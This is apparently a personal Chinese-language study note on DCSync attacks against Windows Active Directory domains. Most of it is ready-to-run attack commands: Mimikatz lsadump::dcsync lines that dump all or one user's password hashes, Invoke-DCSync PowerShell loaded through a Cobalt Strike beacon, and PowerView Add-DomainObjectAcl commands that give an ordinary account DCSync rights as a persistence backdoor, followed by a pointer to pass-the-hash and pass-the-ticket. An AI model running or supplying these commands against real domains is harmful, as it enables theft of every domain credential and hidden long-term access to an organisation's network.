DCSync是域滲透中經常用到的技術(我在大致學習了以后發現確實如此)
利用條件:
獲得以下任一用戶的權限:
Administrators組內的用戶
Domain Admins組內的用戶
Enterprise Admins組內的用戶
域控制器的計算機帳戶
Mimikatz實現
導出域內所有用戶hash
mimikatz.exe privilege::debug "lsadump::dcsync /domain:Mikasa.com /all /csv" exit
導出指定用戶Hash
mimikatz.exe privilege::debug "lsadump::dcsync /domain:Mikasa.com /user:administrator /csv" exit

Powershell實現
https://gist.github.com/monoxgas/9d238accd969550136db
我這里面用CS的Powershell-import導入后使用
導出所有用戶
Invoke-DCSync -DumpForest | ft -wrap -autosize

導出administrator
Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize

導出后我們就可以pth,ptt了
利用DCSync權限維持
利用條件
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1#L8270
Domain Admins組內的用戶
Enterprise Admins組內的用戶
看了一下,好像是利用DCSync對普通用戶添加ACE,用於修改ACL(Access Conotrol list),讓普通用戶也有獲取到域管理員密碼hash的權限
先使用Beacon自帶的,powershell-import導入后使用
添加ACE
powershell Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose
刪除ACE
powershell Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose
效果

站在前人的肩膀上!!